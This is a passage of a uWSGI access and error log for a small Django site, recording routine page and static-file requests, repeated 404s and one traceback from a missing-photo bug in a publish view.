headers in 181 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/81] 117.100.100.38 () {42 vars in 845 bytes} [Fri Jan 8 13:41:24 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/82] 117.100.100.38 () {42 vars in 829 bytes} [Fri Jan 8 13:41:24 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/83] 117.100.100.38 () {42 vars in 831 bytes} [Fri Jan 8 13:41:24 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/84] 117.100.100.38 () {42 vars in 847 bytes} [Fri Jan 8 13:41:24 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/85] 117.100.100.38 () {42 vars in 837 bytes} [Fri Jan 8 13:41:24 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 18965|app: 0|req: 54/86] 117.100.100.38 () {40 vars in 815 bytes} [Fri Jan 8 13:41:25 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 55/87] 117.100.100.38 () {40 vars in 817 bytes} [Fri Jan 8 13:41:25 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 56/88] 117.100.100.38 () {48 vars in 960 bytes} [Fri Jan 8 13:41:33 2021] POST /login/ => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 57/89] 117.100.100.38 () {40 vars in 816 bytes} [Fri Jan 8 13:41:33 2021] GET /home/ => generated 8157 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 58/90] 117.100.100.38 () {40 vars in 819 bytes} [Fri Jan 8 13:41:36 2021] GET /publish => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 59/91] 117.100.100.38 () {40 vars in 821 bytes} [Fri Jan 8 13:41:36 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/92] 117.100.100.38 () {38 vars in 787 bytes} [Fri Jan 8 13:41:37 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +fdsfds 33 +Internal Server Error: /publish/ +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 203, in publish + t_photo_path = 'static/img/t_photo/' + str(t_id) + '_' + t_photo.name +AttributeError: 'NoneType' object has no attribute 'name' +[pid: 18965|app: 0|req: 60/93] 117.100.100.38 () {46 vars in 988 bytes} [Fri Jan 8 13:41:45 2021] POST /publish/ => generated 56678 bytes in 39 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 61/94] 117.100.100.38 () {40 vars in 822 bytes} [Fri Jan 8 13:41:52 2021] GET /publish/ => generated 4909 bytes in 4 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +fdsfds 33 +[pid: 18965|app: 0|req: 62/95] 117.100.100.38 () {46 vars in 992 bytes} [Fri Jan 8 13:42:06 2021] POST /publish/ => generated 0 bytes in 231 msecs (HTTP/1.1 302) 7 headers in 202 bytes (15 switches on core 1) +[pid: 18965|app: 0|req: 63/96] 117.100.100.38 () {40 vars in 825 bytes} [Fri Jan 8 13:42:06 2021] GET /single/6 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 64/97] 117.100.100.38 () {40 vars in 827 bytes} [Fri Jan 8 13:42:06 2021] GET /single/6/ => generated 8267 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/98] 117.100.100.38 () {38 vars in 764 bytes} [Fri Jan 8 13:42:07 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/99] 117.100.100.38 () {38 vars in 762 bytes} [Fri Jan 8 13:42:07 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/100] 117.100.100.38 () {38 vars in 825 bytes} [Fri Jan 8 13:42:07 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 65134 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +None +[pid: 18965|app: 0|req: 65/101] 117.100.100.38 () {46 vars in 996 bytes} [Fri Jan 8 13:42:18 2021] POST /single/6/ => generated 0 bytes in 302 msecs (HTTP/1.1 302) 7 headers in 202 bytes (12 switches on core 1) +[pid: 18965|app: 0|req: 66/102] 117.100.100.38 () {40 vars in 826 bytes} [Fri Jan 8 13:42:18 2021] GET /single/6 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 67/103] 117.100.100.38 () {40 vars in 828 bytes} [Fri Jan 8 13:42:18 2021] GET /single/6/ => generated 8830 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/104] 117.100.100.38 () {38 vars in 873 bytes} [Fri Jan 8 13:42:19 2021] GET /static/img/r_photo/3_%E6%96%87%E6%9C%AC%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%B8%B8%E7%94%A8%E6%A0%87%E7%AD%BE.png => generated 110927 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/105] 117.100.100.38 () {40 vars in 880 bytes} [Fri Jan 8 13:42:19 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 68/106] 117.100.100.38 () {40 vars in 826 bytes} [Fri Jan 8 13:42:23 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +0 +0 +[, ] +[pid: 18965|app: 0|req: 69/107] 117.100.100.38 () {40 vars in 828 bytes} [Fri Jan 8 13:42:27 2021] GET /all-2-0-0 => generated 9158 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /None +[pid: 18965|app: 0|req: 70/108] 117.100.100.38 () {38 vars in 723 bytes} [Fri Jan 8 13:42:27 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/109] 117.100.100.38 () {38 vars in 767 bytes} [Fri Jan 8 13:42:27 2021] GET /static/img/t_photo/4_2.png => generated 88960 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +Not Found: /None +[pid: 18965|app: 0|req: 71/110] 117.100.100.38 () {38 vars in 723 bytes} [Fri Jan 8 13:42:27 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 72/111] 117.100.100.38 () {40 vars in 826 bytes} [Fri Jan 8 13:42:31 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 73/112] 117.100.100.38 () {40 vars in 1365 bytes} [Fri Jan 8 13:44:11 2021] GET /home/ => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 74/113] 117.100.100.38 () {40 vars in 1365 bytes} [Fri Jan 8 13:44:11 2021] GET /home/ => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 75/114] 117.100.100.38 () {40 vars in 1387 bytes} [Fri Jan 8 13:44:12 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 76/115] 117.100.100.38 () {40 vars in 1389 bytes} [Fri Jan 8 13:44:16 2021] GET /all-0-0-0 => generated 10471 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/116] 117.100.100.38 () {38 vars in 1283 bytes} [Fri Jan 8 13:44:16 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +Not Found: /static/img/t_photo/1_2.png +[pid: 18965|app: 0|req: 77/117] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:44:17 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /None +[pid: 18965|app: 0|req: 78/118] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:17 2021] GET /None => generated 3376 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/119] 117.100.100.38 () {40 vars in 1368 bytes} [Fri Jan 8 13:44:17 2021] GET /static/img/t_photo/4_2.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/120] 117.100.100.38 () {38 vars in 1371 bytes} [Fri Jan 8 13:44:17 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 65134 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +0 +0 +[, ] +[pid: 18965|app: 0|req: 79/121] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:20 2021] GET /all-2-0-0 => generated 9102 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /None +[pid: 18965|app: 0|req: 80/122] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:20 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +0 +0 +[, ] +[pid: 18965|app: 0|req: 81/123] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:21 2021] GET /all-3-0-0 => generated 9110 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /None +[pid: 18965|app: 0|req: 82/124] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:21 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[] +[pid: 18965|app: 0|req: 83/125] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:22 2021] GET /all-4-0-0 => generated 8417 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +0 +0 +[, ] +[pid: 18965|app: 0|req: 84/126] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:22 2021] GET /all-2-0-0 => generated 9102 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /None +[pid: 18965|app: 0|req: 85/127] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:23 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +0 +0 +[, ] +[pid: 18965|app: 0|req: 86/128] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:24 2021] GET /all-1-0-0 => generated 9093 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +0 +0 +[, ] +[pid: 18965|app: 0|req: 87/129] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:25 2021] GET /all-1-0-0 => generated 9093 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/img/t_photo/1_2.png +[pid: 18965|app: 0|req: 88/130] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:44:25 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /None +[pid: 18965|app: 0|req: 89/131] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:25 2021] GET /None => generated 3376 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 90/132] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:27 2021] GET /all-0-0-0 => generated 10471 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/img/t_photo/1_2.png +[pid: 18965|app: 0|req: 91/133] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:44:27 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /None +[pid: 18965|app: 0|req: 92/134] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:27 2021] GET /None => generated 3376 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 93/135] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:28 2021] GET /all-0-0-0 => generated 10471 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/img/t_photo/1_2.png +[pid: 18965|app: 0|req: 94/136] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:44:28 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /None +[pid: 18965|app: 0|req: 95/137] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:28 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +0 +0 +[, ] +[pid: 18965|app: 0|req: 96/138] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:29 2021] GET /all-1-0-0 => generated 9093 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/img/t_photo/1_2.png +[pid: 18965|app: 0|req: 97/139] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:44:29 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /None +[pid: 18965|app: 0|req: 98/140] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:29 2021] GET /None => generated 3376 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +0 +0 +[, ] +[pid: 18965|app: 0|req: 99/141] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:37 2021] GET /all-1-0-0 => generated 9093 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/img/t_photo/1_2.png +[pid: 18965|app: 0|req: 100/142] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:44:37 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /None +[pid: 18965|app: 0|req: 101/143] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:37 2021] GET /None => generated 3376 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +0 +0 +[, ] +[pid: 18965|app: 0|req: 102/144] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:38 2021] GET /all-2-0-0 => generated 9102 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /None +[pid: 18965|app: 0|req: 103/145] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:38 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +0 +0 +[, ] +[pid: 18965|app: 0|req: 104/146] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:38 2021] GET /all-3-0-0 => generated 9110 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /None +[pid: 18965|app: 0|req: 105/147] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:38 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/148] 117.100.100.38 () {40 vars in 1426 bytes} [Fri Jan 8 13:44:38 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +0 +0 +[, ] +[pid: 18965|app: 0|req: 106/149] 117.100.100.38 () {40 vars in 828 bytes} [Fri Jan 8 13:44:41 2021] GET /all-1-0-0 => generated 9149 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/img/t_photo/1_2.png +[pid: 18965|app: 0|req: 107/150] 117.100.100.38 () {38 vars in 767 bytes} [Fri Jan 8 13:44:41 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /None +[pid: 18965|app: 0|req: 108/151] 117.100.100.38 () {38 vars in 723 bytes} [Fri Jan 8 13:44:42 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +0 +0 +[, ] +[pid: 18965|app: 0|req: 109/152] 117.100.100.38 () {40 vars in 826 bytes} [Fri Jan 8 13:44:42 2021] GET /all-2-0-0 => generated 9158 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /None +[pid: 18965|app: 0|req: 110/153] 117.100.100.38 () {38 vars in 721 bytes} [Fri Jan 8 13:44:43 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/154] 117.100.100.38 () {40 vars in 820 bytes} [Fri Jan 8 13:44:43 2021] GET /static/img/t_photo/4_2.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +Not Found: /None +[pid: 18965|app: 0|req: 111/155] 117.100.100.38 () {38 vars in 722 bytes} [Fri Jan 8 13:44:43 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +0 +0 +[, ] +[pid: 18965|app: 0|req: 112/156] 117.100.100.38 () {40 vars in 827 bytes} [Fri Jan 8 13:44:43 2021] GET /all-3-0-0 => generated 9166 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /None +[pid: 18965|app: 0|req: 113/157] 117.100.100.38 () {38 vars in 722 bytes} [Fri Jan 8 13:44:43 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/158] 117.100.100.38 () {38 vars in 824 bytes} [Fri Jan 8 13:44:44 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 65134 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +Not Found: /None +[pid: 18965|app: 0|req: 114/159] 117.100.100.38 () {38 vars in 722 bytes} [Fri Jan 8 13:44:44 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 115/160] 117.100.100.38 () {40 vars in 827 bytes} [Fri Jan 8 13:44:45 2021] GET /all-0-0-0 => generated 10527 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/img/t_photo/1_2.png +[pid: 18965|app: 0|req: 116/161] 117.100.100.38 () {38 vars in 766 bytes} [Fri Jan 8 13:44:45 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /None +[pid: 18965|app: 0|req: 117/162] 117.100.100.38 () {38 vars in 722 bytes} [Fri Jan 8 13:44:45 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/img/t_photo/1_2.png +[pid: 18965|app: 0|req: 118/163] 117.100.100.38 () {38 vars in 766 bytes} [Fri Jan 8 13:44:45 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /None +[pid: 18965|app: 0|req: 119/164] 117.100.100.38 () {38 vars in 722 bytes} [Fri Jan 8 13:44:45 2021] GET /None => generated 3376 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +0 +0 +[, ] +[pid: 18965|app: 0|req: 120/165] 117.100.100.38 () {42 vars in 1423 bytes} [Fri Jan 8 13:45:08 2021] GET /all-3-0-0 => generated 9110 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /None +[pid: 18965|app: 0|req: 121/166] 117.100.100.38 () {38 vars in 1268 bytes} [Fri Jan 8 13:45:08 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/167] 117.100.100.38 () {40 vars in 1425 bytes} [Fri Jan 8 13:45:08 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +0 +0 +[, ] +[pid: 18965|app: 0|req: 122/168] 117.100.100.38 () {42 vars in 1423 bytes} [Fri Jan 8 13:45:08 2021] GET /all-3-0-0 => generated 9110 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /None +[pid: 18965|app: 0|req: 123/169] 117.100.100.38 () {38 vars in 1268 bytes} [Fri Jan 8 13:45:08 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 124/170] 117.100.100.38 () {40 vars in 1392 bytes} [Fri Jan 8 13:45:09 2021] GET /all-0-0-0 => generated 10471 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/img/t_photo/1_2.png +[pid: 18965|app: 0|req: 125/171] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:45:09 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /None +[pid: 18965|app: 0|req: 126/172] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:45:09 2021] GET /None => generated 3376 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/173] 117.100.100.38 () {40 vars in 1368 bytes} [Fri Jan 8 13:45:09 2021] GET /static/img/t_photo/4_2.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +0 +0 +[, ] +[pid: 18965|app: 0|req: 127/174] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:45:13 2021] GET /all-1-0-0 => generated 9093 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/img/t_photo/1_2.png +[pid: 18965|app: 0|req: 128/175] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:45:13 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /None +[pid: 18965|app: 0|req: 129/176] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:45:13 2021] GET /None => generated 3376 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +0 +0 +[, ] +[pid: 18965|app: 0|req: 130/177] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:45:13 2021] GET /all-2-0-0 => generated 9102 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /None +[pid: 18965|app: 0|req: 131/178] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:45:13 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 132/179] 117.100.100.38 () {40 vars in 1385 bytes} [Fri Jan 8 13:45:20 2021] GET /home/ => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 133/180] 117.100.100.38 () {40 vars in 1387 bytes} [Fri Jan 8 13:45:21 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 134/181] 117.100.100.38 () {40 vars in 1383 bytes} [Fri Jan 8 13:45:24 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 135/182] 223.104.39.100 () {38 vars in 935 bytes} [Fri Jan 8 13:50:52 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/183] 223.104.39.100 () {40 vars in 957 bytes} [Fri Jan 8 13:50:52 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/184] 223.104.39.100 () {40 vars in 961 bytes} [Fri Jan 8 13:50:52 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/185] 223.104.39.100 () {40 vars in 979 bytes} [Fri Jan 8 13:50:52 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/186] 223.104.39.100 () {40 vars in 959 bytes} [Fri Jan 8 13:50:52 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/187] 223.104.39.100 () {40 vars in 940 bytes} [Fri Jan 8 13:50:52 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/188] 223.104.39.100 () {40 vars in 965 bytes} [Fri Jan 8 13:50:52 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/189] 223.104.39.100 () {40 vars in 938 bytes} [Fri Jan 8 13:50:52 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/190] 223.104.39.100 () {40 vars in 956 bytes} [Fri Jan 8 13:50:52 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 